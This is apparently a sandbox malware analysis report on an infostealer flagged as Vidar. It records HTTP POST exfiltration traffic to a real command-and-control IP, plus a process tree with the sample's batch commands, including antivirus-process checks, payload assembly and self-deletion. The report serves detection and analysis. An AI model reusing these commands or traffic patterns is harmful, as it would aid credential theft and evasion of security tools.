                                                                        2024-08-05 16:56:45 UTC1977OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------BAEBGHCFCAAFIECAFIIICont
                                                                        2024-08-05 16:56:46 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.549746188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:46 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIII
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 3161
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:46 UTC3161OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 48 43 46 43 41 41 46 49 45 43 41 46 49 49 49 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------BAEBGHCFCAAFIECAFIIIContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------BAEBGHCFCAAFIECAFIIICont
                                                                        2024-08-05 16:56:47 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:47 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.549747188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:47 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHC
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 1697
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:47 UTC1697OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------GDBKJDGIJECFIEBFIDHCCont
                                                                        2024-08-05 16:56:48 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.549748188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:48 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKE
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 1929
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:48 UTC1929OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------GCAFCAFHJJDBFIECFBKECont
                                                                        2024-08-05 16:56:49 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.549749188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:49 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBG
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 465
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:49 UTC465OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 48 49 45 47 43 46 48 43 47 44 47 43 41 45 43 42 47 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------CGDHIEGCFHCGDGCAECBGContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------CGDHIEGCFHCGDGCAECBGCont
                                                                        2024-08-05 16:56:50 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.549750188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:51 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAE
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 331
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:51 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 46 48 4a 45 47 43 46 43 42 46 49 45 47 43 41 45 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------JECAFHJEGCFCBFIEGCAEContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------JECAFHJEGCFCBFIEGCAECont
                                                                        2024-08-05 16:56:52 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:52 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.549751188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:52 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 331
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:52 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------DBKKFHIEGDHJKECAAKKECont
                                                                        2024-08-05 16:56:53 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:53 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:12:54:53
                                                                        Start date:05/08/2024
                                                                        Path:C:\Users\user\Desktop\lem.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\lem.exe"
                                                                        Imagebase:0x400000
                                                                        File size:863'224 bytes
                                                                        MD5 hash:BB74165A5EB382A47E26F4EFD8C2F151
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:12:54:56
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit
                                                                        Imagebase:0x790000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:12:54:56
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:12:54:57
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:tasklist
                                                                        Imagebase:0xc40000
                                                                        File size:79'360 bytes
                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:12:54:57
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                        Imagebase:0xcf0000
                                                                        File size:29'696 bytes
                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:12:54:57
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:tasklist
                                                                        Imagebase:0xc40000
                                                                        File size:79'360 bytes
                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:12:54:57
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                                                        Imagebase:0xcf0000
                                                                        File size:29'696 bytes
                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:12:54:58
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:cmd /c md 366791
                                                                        Imagebase:0x790000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:12:54:58
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:findstr /V "TrailersTractOffersVenezuela" Mines
                                                                        Imagebase:0xcf0000
                                                                        File size:29'696 bytes
                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:12:54:58
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:cmd /c copy /b Pending + Smith + Specifications + Resident 366791\M
                                                                        Imagebase:0x790000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:12:54:59
                                                                        Start date:05/08/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Wow64 process (32bit):true
                                                                        Commandline:366791\Gift.pif 366791\M
                                                                        Imagebase:0x2d0000
                                                                        File size:893'608 bytes
                                                                        MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2545299732.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 7%, ReversingLabs
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:12:54:59
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:timeout 5
                                                                        Imagebase:0x910000
                                                                        File size:25'088 bytes
                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:16
                                                                        Start time:12:56:53
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\366791\Gift.pif" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit
                                                                        Imagebase:0x790000
                                                                        File size:236'544 bytes
                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:17
                                                                        Start time:12:56:53
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:18
                                                                        Start time:12:56:53
                                                                        Start date:05/08/2024
                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:timeout /t 10
                                                                        Imagebase:0x910000
                                                                        File size:25'088 bytes
                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:13.1%
